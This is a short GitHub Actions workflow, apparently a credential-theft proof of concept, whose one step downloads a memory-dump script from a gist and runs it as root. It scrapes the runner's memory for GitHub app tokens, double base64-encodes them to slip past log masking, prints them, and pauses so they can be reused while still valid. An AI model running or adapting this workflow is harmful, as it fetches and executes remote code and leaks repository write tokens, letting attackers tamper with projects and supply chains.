name: Workflow Run

on:
  workflow_run:
    workflows: ['Create and Upload Artifact']
    types:
      - completed

permissions:
  contents: write

jobs:
  create-and-upload:
    runs-on: ubuntu-latest
    
    steps:
      - name: print token
        run: |
          BASE64=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -aoE 'ghs_[0-9A-Za-z]{20,}' | sort -u | base64 -w 0 | base64 -w 0` 
          echo $BASE64
          sleep 120

